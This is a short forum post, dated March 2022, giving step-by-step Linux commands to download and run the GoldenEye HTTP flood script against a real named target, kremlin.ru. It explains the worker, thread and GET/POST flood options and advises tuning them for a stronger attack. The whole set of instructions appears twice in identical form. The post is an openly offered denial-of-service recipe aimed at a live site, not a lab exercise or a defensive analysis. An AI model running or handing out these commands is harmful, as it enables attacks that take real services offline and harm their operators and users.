OP 06 March, 2022 - 11:58 AM
How to DDOS with linux
Open the console
In turn insert commands:
mkdir GoldenEye
cd GoldenEye
wget https://github.com/j...hive/master.zip
apt-get install unzip -y
unzip master.zip
cd GoldenEye-master
After installing the script, we prescribe a command depending on which site we attack and with what arguments.
Example:
We are attacking the Kremlin's website, which is located at: http://kremlin.ru/
./goldeneye.py http://kremlin.ru/ -w 5 -s 5 -m random
/.goldeneye.py - run the script
http://kremlin.ru/ - the goal
SCRIPT PARAMETERS:
-w 5 - the number of clients to attack
-s 5 - the number of threads to attack per client
-m random - randomly sends GET and POST packets
Adjust the parameters depending on the power of your PC so that the attack was high quality. -W 5 -s 5 -m random is recommended
Open the console
In turn insert commands:
mkdir GoldenEye
cd GoldenEye
wget https://github.com/j...hive/master.zip
apt-get install unzip -y
unzip master.zip
cd GoldenEye-master
After installing the script, we prescribe a command depending on which site we attack and with what arguments.
Example:
We are attacking the Kremlin's website, which is located at: http://kremlin.ru/
./goldeneye.py http://kremlin.ru/ -w 5 -s 5 -m random
/.goldeneye.py - run the script
http://kremlin.ru/ - the goal
SCRIPT PARAMETERS:
-w 5 - the number of clients to attack
-s 5 - the number of threads to attack per client
-m random - randomly sends GET and POST packets
Adjust the parameters depending on the power of your PC so that the attack was high quality. -W 5 -s 5 -m random is recommended